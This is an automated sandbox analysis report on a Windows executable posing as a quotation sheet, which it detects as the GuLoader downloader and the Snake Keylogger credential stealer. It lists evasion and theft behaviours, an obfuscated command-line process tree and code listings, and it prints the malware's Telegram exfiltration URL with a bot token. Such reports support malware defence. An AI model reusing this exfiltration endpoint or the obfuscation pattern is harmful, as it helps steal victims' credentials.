Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1QuotationSheetVSAA6656776.exe

Overview

General Information

Sample name:z1QuotationSheetVSAA6656776.exe
Analysis ID:1480054
MD5:cfb41760f84e1e70bade0ca7394d424b
SHA1:139d1068c52255526ec38fe7ce0c48c365492712
SHA256:a2be0d024f1ed07193631fd4bcf91b224685a2624a3396dedbed5d071c29889f
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Initial sample is a PE file and has a suspicious name
Mass process execution to delay analysis
Obfuscated command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • z1QuotationSheetVSAA6656776.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe" MD5: CFB41760F84E1E70BADE0CA7394D424B)
    • cmd.exe (PID: 6292 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6448 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6292 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2996 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3112 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6292 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2588 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3584 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7832 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8276 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8340 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8396 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8452 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8512 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8568 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8624 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8680 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8736 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8792 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8848 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8904 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8960 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9016 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9072 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9128 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9204 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8316 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8372 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8436 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8460 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8520 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8572 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8728 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8784 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8828 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8880 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8936 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8992 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9060 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9112 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9172 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8260 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8448 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8504 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8540 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8620 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6812 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8568 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8708 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8780 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8824 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8888 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8936 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8992 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9060 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9112 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9172 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 9204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8260 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8408 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8472 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8512 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8652 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 8660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7488405197:AAH7tXu4zKMAWY-fq5Ygp2Q20mBw5pxUA68/sendMessage?chat_id=1545867115"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.38290946612.000000000057E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
    00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000000.00000002.38293091270.0000000005981000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5544JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: z1QuotationSheetVSAA6656776.exeAvira: detected
            Found malware configuration
            Source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7488405197:AAH7tXu4zKMAWY-fq5Ygp2Q20mBw5pxUA68/sendMessage?chat_id=1545867115"}
            Multi AV Scanner detection for submitted file
            Source: z1QuotationSheetVSAA6656776.exeReversingLabs: Detection: 50%

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784BBC8 CryptUnprotectData,131_2_3784BBC8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784C302 CryptUnprotectData,131_2_3784C302
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_3784C250 CryptUnprotectData,131_2_3784C250
            Source: z1QuotationSheetVSAA6656776.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2
            Source: z1QuotationSheetVSAA6656776.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00406167 FindFirstFileA,FindClose,131_2_00406167
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,131_2_00405705
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 131_2_00402688 FindFirstFileA,131_2_00402688
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 0016F1FEh131_2_0016F01B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 0016FB88h131_2_0016F01B
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h131_2_0016E530
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h131_2_0016EB63
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h131_2_0016ED44
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37841A38h131_2_37841620
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37841471h131_2_378411C0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 3784F9A7h131_2_3784F700
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 3784FDFFh131_2_3784FB58
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 3784F54Fh131_2_3784F2A8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then mov esp, ebp131_2_3784DEB0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 3784F0F7h131_2_3784EE50
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 3784E847h131_2_3784E5A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 3784EC9Fh131_2_3784E9F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37840BB1h131_2_37840900
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 3784E3EFh131_2_3784E148
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37841A38h131_2_37841966
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37841011h131_2_37840D60
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37840751h131_2_378404A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 378402F1h131_2_37840040
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B92E57h131_2_37B92BB0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9B4A3h131_2_37B9B168
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B99E58h131_2_37B99BB0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B91447h131_2_37B911A0
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B9189Fh131_2_37B915F8
            Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exeCode function: 4x nop then jmp 37B98877h131_2_37B985D0
